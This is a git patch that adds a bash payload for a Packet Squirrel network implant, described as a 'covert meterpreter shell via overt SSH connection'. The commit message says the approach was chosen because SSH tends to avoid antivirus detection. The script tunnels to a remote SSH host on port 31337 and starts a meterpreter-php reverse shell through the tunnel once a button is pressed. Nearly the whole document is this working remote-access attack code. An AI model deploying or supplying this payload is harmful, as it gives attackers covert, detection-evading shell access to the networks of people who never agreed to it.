From 75df92285ca5c965af1f4f34f128e3c7fea3378e Mon Sep 17 00:00:00 2001
From: neislerjp37 <40807188+neislerjp37@users.noreply.github.com>
Date: Tue, 9 Oct 2018 16:19:42 -0400
Subject: [PATCH] meterpreter via ssh from packet squirrel repo

ssh usually avoids AV detection so I borrowed this from packet squirrel repo
---
 meterpreter via ssh | 147 ++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 147 insertions(+)
 create mode 100644 meterpreter via ssh

diff --git a/meterpreter via ssh b/meterpreter via ssh
new file mode 100644
index 0000000..b2f8fc9
--- /dev/null
+++ b/meterpreter via ssh	
@@ -0,0 +1,147 @@
+#!/bin/bash
+
+# Title:         Meterpreter-via-SSH
+
+# Description:   Covert meterpreter shell via overt SSH connection
+
+# Author:        Zappus
+
+# Version:       1.0
+
+# Category:      Remote-Access
+
+# Net Mode:      NAT
+
+# Firmware:      1.2
+
+# 
+
+# LED State Descriptions
+
+# Magenta Solid - Configuring NETMODE
+
+# LED OFF - Waiting for BUTTON
+
+# Red Blink 2 Times - SSH Connection Failed
+
+# Amber Blink 5 Times - SSH Connection Successful
+
+# Red Blink 1 Time - Meterpreter Failed
+
+# Cyan Blink 1 Time - Meterpreter Successful
+
+
+
+
+
+SSH_USER="username"
+
+SSH_HOST="hostname"
+
+MSF_PORT=31337
+
+
+
+function start()
+
+{
+
+        LED SETUP
+
+        NETMODE NAT
+
+        sleep 5
+
+        LED OFF
+
+        
+
+        # Wait until BUTTON is pressed 
+
+        while true
+
+        do
+
+                NO_LED=1 BUTTON  && {
+
+                        # close any existing meterpreter and SSH connections
+
+                        kill `pgrep php` 2> /dev/null
+
+                        kill `pgrep -x ssh` 2> /dev/null
+
+                        sleep 2
+
+
+
+                        # Establish connection to remote SSH server
+
+                        ssh -f -N -T -M -L $MSF_PORT:127.0.0.1:$MSF_PORT $SSH_USER@$SSH_HOST
+
+
+
+                        # Check if SSH connection worked
+
+                        if [ -z `pgrep -x ssh` ]
+
+                        then
+
+                                LED FAIL
+
+                                sleep 5
+
+                                LED OFF
+
+                                continue
+
+                        else
+
+                                LED STAGE1
+
+                                sleep 5
+
+                        fi
+
+
+
+                        # Start meterpreter reverse shell
+
+                        meterpreter-php 127.0.0.1 $MSF_PORT &
+
+                        sleep 2
+
+
+
+                        # Check if meterpreter shell started
+
+                        if [ -z `pgrep php` ]
+
+                        then
+
+                                # Close SSH connection because meterpreter failed
+
+                                kill `pgrep -x ssh` 2> /dev/null
+
+                                LED FAIL
+
+                        else
+
+                                LED SPECIAL
+
+                        fi
+
+                        sleep 1
+
+                        LED OFF
+
+                        }
+
+        done
+
+}
+
+
+
+# Start the payload
+
+start &